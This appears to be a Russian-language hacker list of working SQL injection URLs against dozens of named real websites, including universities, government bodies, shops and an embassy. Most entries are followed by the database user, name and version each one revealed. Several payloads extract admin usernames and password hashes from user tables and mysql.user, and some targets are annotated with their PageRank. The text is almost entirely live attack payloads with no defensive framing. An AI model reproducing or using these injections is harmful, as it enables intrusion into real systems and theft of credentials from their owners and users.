user - [quality@mercury.ulstu.ru]
database - [quality_ulstu_ru]
version - [4.1.25-log]

-----------


http://milam.com.ua/news/news_one.php?id=-9+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8--


user - [h01008_milam@localhost]
database - [h01008_milam]
version - [5.0.81-community]

Таблицы

http://milam.com.ua/news/news_one.php?id=-9+union+select+1,TABLE_NAME,3,4,5,6,7,8+from+INFOR MATION_SCHEMA.TABLES+limit+20,1--




-----------

http://www.softplasma-server.info/ar/news_one.php?id=-509+union+select+1,2,concat_ws(0x3a,user(),databas e(),version()),4,5,6--


user - [softpl89_yasser@localhost]
database - [softpl89_gcapital]
version - [5.0.81-community]

BR подборка, сайты одинаковые по дизайну, PR 3:
http://www.guiabebedouro.com.br/detalhe_empresa.php?id_empresa=-736+union+select+1,2,3,4,concat_ws(char(58,58),use r(),database(),version()),6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 ,49,50,51,52--
@localhost::guiabebe_guiabeb::5.0.81-community

http://www.portalguiaribeirao.com.br/detalhe_empresa.php?id_empresa=-147+union+select+1,2,3,4,concat_ws(char(58,58),use r(),database(),version()),6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 ,49,50,51,52--
@localhost::portal_guiaribeirao::5.0.81-community

http://pomservicealimentaire.ca/lang/fr/product.php?productID=-127+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+inf ormation_schema.tables+--+&regionID=QC

http://www.gammereunir.fr/product.php?productid=-38+union+select+1,2,3+from+information_schema.tabl es+--+

http://generation-artisans.fr/view-article.php?idarticle=-2+union+select+1,2,3,4,5+from+ga_clients+/*+

http://nhaantoan.com/index.php?page=tintuc&code=tkm&id=-201+union+select+unhex(hex(concat_ws(0x3a3a,id_dan hmuc,username,password,level))),2,3,4,5,6+from+gws _admin+--+

web@cgi31-ch.uk.clara.net : 5.0.18-nt
http://partydigest.com/news_detail.php?nid=-49+union+select+1,2,3,concat_ws(0x203a20,version() ,user()),5,6,7,8,9,10,11,12

4.1.14-log : bookmarks@localhost
http://www.winthernet.dk/bookmarks/view_group.php?id=-55+union+select+1,2,unhex(hex(concat_ws(0x203a20,v ersion(),user(),host,user,password,file_priv))),4, 5,6,7,8+from+mysql.user--

http://www.goszakaz.inconnect.ru/images/Logo_Gosz_2010.jpg
http://www.goszakaz.inconnect.ru/?id=10001&n=-3365+union+select+1,2,3,concat_ws(0x3a,databas

e(),user(),version()),5,6
goszakaz@vh1.cetis.ru:5.0.67-community-nt

http://www.rpgboard.de/showmember.php4?id=-63471+union+select+1,2,concat_ws(0x3a,user(),datab ase(),version()),4,5,6,7,8,9,10+--+&lvis=

User: rpgboard@localhost
Database: rpgboard
Version: 5.0.26-log

Мед продают...
http://www.apishop.ru/good.php?id=1+union+select+1,ConCat(email,Char(58) ,password),3,4,5,6,7,8+FROM+prgp_user+LIMIT+0,1+--

Формы входа не нашел
http://smallbusinessohs.com.au/register.php?id=-1+union+select+1,ConCat(username,Char(58),password )+FROM+users+LIMIT+0,1+--

Журналы какие-то:
http://www.lcoastpress.com/book.php?id=1 union select 1,ConCat(username,Char(58),password),3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20 FROM user LIMIT 0,1 --

Ролики:
http://mytytv.com/flv/mp3.php?id=-1%20union%20select%201,2,3,concat_ws%280x3a,user%2 8%29,database%28%29,version%28%29%29,5,6,7,8,9,10, 11,12,13,14,15%20--
User:mytytv1@localhost
Database:mytytv1
Version:5.0.24

Медиа:
http://giaitri.com/new/mp3.php?id=-1%20union%20select%201,2,concat_ws%280x3a,user%28% 29,database%28%29,version%28%29%29,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22%20--
User:lmvn@192.168.1.106
Database:news
Version:5.0.22-log

Сайт студентов:
http://www.csulb.edu/divisions/students/calendar/eventlist.php?list=id&id=1%20union%20select%201,2,3,4,5,6,7,ConCat%28use rname,Char%2858%29,password,Char%2858%29,email%29, 9,10,11,12,13,14,15,16%20FROM%20phpc_users%20LIMIT %200,1--

pmtrans.com.pl PR-4 blind

http://pmtrans.com.pl/aktualnosci.php?id=22+and+1=IF(ASCII(SUBSTRING((SE LECT+version()),1,1))=52,1,0)

user: itss@localhost
version: 4.1.5-gamma
database: wwwpmtnew

Auroratheatre.org pr5
Aurora Theatre Company.
http://www.auroratheatre.org/show.php?prod_id=50+and+substring(version(),1,1)=4/*version: 4.1.22-max
compile os: pc-linux-gnu
user: aurora@208.68.104.109
database: auroradb

Какойто шоп

http://www.abaka.ru/main/shop?id=-756+union+select+concat_ws(0x3a,user(),version(),d atabase())--&em=1

user - [abaka_ru@localhost]
version - [5.0.18]
database - [abaka_ru]

Тороговый центр(не магаз):
http://www.itcdc.com/about.php?p=6%20union%20select%201,2,ConCat%28user name,Char%2858%29,password%29,4%20FROM%20users%20--

Буржуйская газета:
http://www.dailygut.com/index.php?i=4169%20union%20select%201,ConCat%28use rname,Char%2858%29,password%29,3,4,5,6,7,8,9,10,11 ,12,13%20FROM%20Users%20--

Японский универ:
http://www.doshisha.ac.jp/english/news/index.php?i=-1%20union%20select%201,2,concat_ws%280x3a,user%28% 29,database%28%29,version%28%29%29,4,5,6,7,8,9,10, 11,12,13%20--

Польский институт или церковь =)):
http://www.pokoleniebxvi.pl/artykul.php?a=1%20union%20select%201,2,3,4,5,6,7,c oncat_ws%280x3a,user%28%29,database%28%29,version% 28%29%29,9,10,11,12%20--

Открытки:
http://www.grameenfoundation.org/e-cards/write.php?card=-1%20union%20select%201,2,3,4,concat_ws%280x3a,user %28%29,database%28%29,version%28%29%29,6%20--

Фигню для труб делают:
http://www.americanhydrostatics.com/linecard.php?card=-1%20union%20select%20ConCat%28user%28%29,Char%2858 %29,database%28%29,char%2858%29,version%28%29%29,2 ,3,4,5,6,7%20--

Фотогаллерея:
http://www.marcpaeps.com/min.php?c=1%20union%20select%201,2,3,ConCat_ws%280 x3a,user%28%29,database%28%29,version%28%29%29,5,6 ,7,8,9,10,11,12%20--

Про какой-то город:
http://www.wrigleys.co.uk/charity/sub.php?c=-1%20union%20select%201,2,3,4,5,ConCat_ws%280x3a,us er%28%29,database%28%29,version%28%29%29,7,8%20--

Про Въетнам:
http://www.vietnamembassy.us/news/story.php?d=-1%20union%20select%201,2,3,4,5,ConCat_ws%280x3a,us er%28%29,database%28%29,version%28%29%29,7,8,9,10, 11%20--

Ассоциация изучения технологий:
http://www.alt.ac.uk/workshop_detail.php?e=-1%20union%20select%20ConCat_ws%280x3a,user%28%29,d atabase%28%29,version%28%29%29,2,3,4,5,6%20--

geog.utah.edu - .edu and PR=5

http://www.geog.utah.edu/faculty/index.html?id=1/**/and/**/1=2%20/**/union/**/all/**/select/**/1,2,3,4,version(),database(),7,8,9,0,1,2,3,user(), 5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8/*
version - 5.0.22-log
database - geog
user - geogweb@res6-web1.csbs.utah.edu



table - users (username, password)
http://www.geog.utah.edu/faculty/index.html?id=1/**/and/**/1=2%20/**/union/**/all/**/select/**/1,2,3,4,username,6,7,8,9,0,1,2,3,password,5,6,7,8, 9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8/**/from/**/users/*

-----------

http://www.wrboats.ru/catalog.php?id=-5+union+select+1,concat_ws(0x3a,database(),version (),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19--
http://www.wrboats.ru/catalog.php?id=-5+union+select+1,concat_ws(0x3a,id,user,login,pass ),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from +users--


database - [a2748_wrboats]
version - [5.0.75-percona-highperf-b11-log]
user - [a2748_wrboats@94.103.90.10]
-----------

http://www.stroyazbuka.com/firm/infocard.php?id=-115447+union+select+1,concat_ws(0x3a,database(),ve rsion(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20%20--

belindust_firm:5.0.26-log:belindust_firm@localhost

ecotextile.com PR-5

http://www.ecotextile.com/news_details.php?id=-10029+union+select+1,concat_ws(0x3a,user(),version (),database()),3,4+--+

mow01_oldadm@localhost:4.1.22-standard:mow01_oldetn

Таблица admin, колонки user_name, password
Админки не нашел(

http://www.exposicaodeartesanato.com.br/detalhe_produto.php?id_produto=-1+union+all+select+1,2,3,4,5,6,7,8,concat_ws(char( 58,58),user(),database(),version()),10,11,12,13,14 ,15,16,17,18,19--

expos_sirius@localhost::expos_exposicao::4.1.22-standard

Российский союз промышленников и предпринимателей.
тИЦ: 1400
PR: 6

http://www.rspp.ru/Default.aspx?CatalogId=283&Year=2009+union+all+select+null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,@@version,28+from+information_schema.tables--&Month=10&Day=15

Microsoft SQL Server 2000 - 8.00.2055 (Intel X86)
Dec 16 2008 19:46:53
Copyright (c) 1988-2003 Microsoft Corporation
Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)


Федеральное государственное учреждение «Научно исследовательский институт — Республиканский исследовательский научно-консультационный центр экспертизы»
тИЦ: 1700
PR: 5

http://www.extech.ru/library/spravo/vak/tolko_vak/f1.php?kod1=-1+union+select+concat_ws(0x3a,database(),user(),ve rsion()),2,3,4,5
VAK:php@localhost:5.0.32-Debian_7etch11-log

http://www.redorange.de/public/php/showreel_detail.php?id=116+union+select+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
Database Version: 5.0.32-Debian_7etch5-log
Database name: usr_web190_1
User name: web190@localhost

http://www.podlupom.com/index.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--

Версия:
http://www.podlupom.com/index.php?id=-1 UNION ALL SELECT 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17, 18,19--

Таблицы:
http://www.podlupom.com/index.php?id=-1 UNION ALL SELECT 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19 FROM information_schema.tables--

Колонки:
http://www.podlupom.com/index.php?id=-1 UNION ALL SELECT 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19 FROM information_schema.columns--

http://www.podlupom.com/index.php?id=-1UNION ALL SELECT 1,2,3,4,schema_name,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19 FROM information_schema.schemata--

Microsoft JET Database Engine:

http://www.packet.com.cn/product_view.asp?id=283+union+select+1,2,3,admin,p assword,6,7,8,9,10,11,12,13,14,15+from+admin

Система комплексного раскрытия информации
тИЦ: 2700
PR: 6
http://www.skrin.ru/news/default.asp?id=9DC3ABAF4E4C49DF99A6913572D9A323'+O R+1=(select+@@version)--
Microsoft SQL Server 2005 - 9.00.3077.00 (X64) Dec 17 2008 20:40:08 Copyright (c) 1988-2005
Microsoft Corporation Standard Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)

http://glinka-capella.ru/news/?id=-1+union+select+1,2,3,concat_ws(0x3a,concat_ws(0x3a ,user(),version()),database()),5,6+--+

ТИЦ: 230
PR: 4

User: h_glinka_capella@localhost
Version: 5.0.70-debug-log
Name: glinka_capella_ru

mhs.ox.ac.uk pr7, v5
http://www.mhs.ox.ac.uk/gatt/catalog.php?num=33+and+2=1+union+select+version(), 2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%23

http://www.planetperplex.com/en/img.php?id=-35+UNION+SELECT+1,2,3,4,5,AES_DECRYPT(AES_ENCRYPT( CONCAT_WS(0x3a,Version(),Database(),User()),0x71), 0x71),7--
User: p5547pla_admin@localhost
Database: p5547pla_planetperplex
Version:81-community

Сайт какой-то фирмы:
http://www.swisslinx.com/index2.php?h=63&key=-1%20union%20select%201,2,3,ConCat_ws%280x3a,user%2 8%29,database%28%29,version%28%29%29,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23%20--

Риэлторы в Севастополе:
http://www.sevhouse.com/photo.php?h=56%20union%20select%20ConCat_ws%280x3a ,user%28%29,database%28%29,version%28%29%29,2,3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20--

Агрокультуры резюме(с прикольным фильтром):
http://careersolutionsco.com/jobs/jobdetails.php?j=105%20union%20select%201,2,3,4,5, aes_decrypt%28aes_encrypt%28ConCat_ws%280x3a,user% 28%29,database%28%29,version%28%29%29,0x22%29,0x22 %29,7,8,9%20--

Французики:
http://www.oqe.ch/index.php?l=FR&rub=1&cat=3&page=-1%20%20union%20select%201,2,3,ConCat_ws%280x3a,use r%28%29,database%28%29,version%28%29%29,5,6,7,8,9% 20--

Metropolitan Market
http://metropolitan-market.com/locations.php?l=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,ConCat_ws%280x3a,user%28%29,database% 28%29,version%28%29%29,19,20%20--

Книжный магазин:
http://www.krkediciones.com/fichaLibro.php?l=-1%20union%20select%201,2,3,4,5,6,7,ConCat_ws%280x3 a,user%28%29,database%28%29,version%28%29%29,9,10, 11,12,13%20--

Немцы:
http://213.133.108.158/surveys/index.php?m=msg,1&gID=-1%20union%20select%201,aes_decrypt%28aes_encrypt%2 8ConCat_ws%280x3a,user%28%29,database%28%29,versio n%28%29%29,0x41%29,0x41%29,3%20--

Хомяк какого-то чела:
http://www.matt-clark.co.uk/spe.php?o=-1%20union%20select%201,ConCat_ws%280x3a,user%28%29 ,database%28%29,version%28%29%29,3,4%20--

Японцы:
http://www.muryoj.com/get.php?R=-1%20union%20select%201,2,3,aes_decrypt%28aes_encry pt%28ConCat_ws%280x3a,user%28%29,database%28%29,ve rsion%28%29%29,0x41%29,0x41%29,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22%20--

Такой же японский двиг:
http://mailzou.com/get.php?R=-1%20union%20select%201,2,3,aes_decrypt%28aes_encry pt%28ConCat_ws%280x3a,user%28%29,database%28%29,ve rsion%28%29%29,0x41%29,0x41%29,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21%20--

То же самое без фильтра:
http://xam.jp/get.php?R=-1%20union%20select%201,2,ConCat_ws%280x3a,user%28% 29,database%28%29,version%28%29%29,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31%20--

Танц клуб:
http://www.sustainabledanceclub.com/index.php?t=newsd&n=-1%20union%20select%201,2,3,4,ConCat_ws%280x3a,user %28%29,database%28%29,version%28%29%29%20--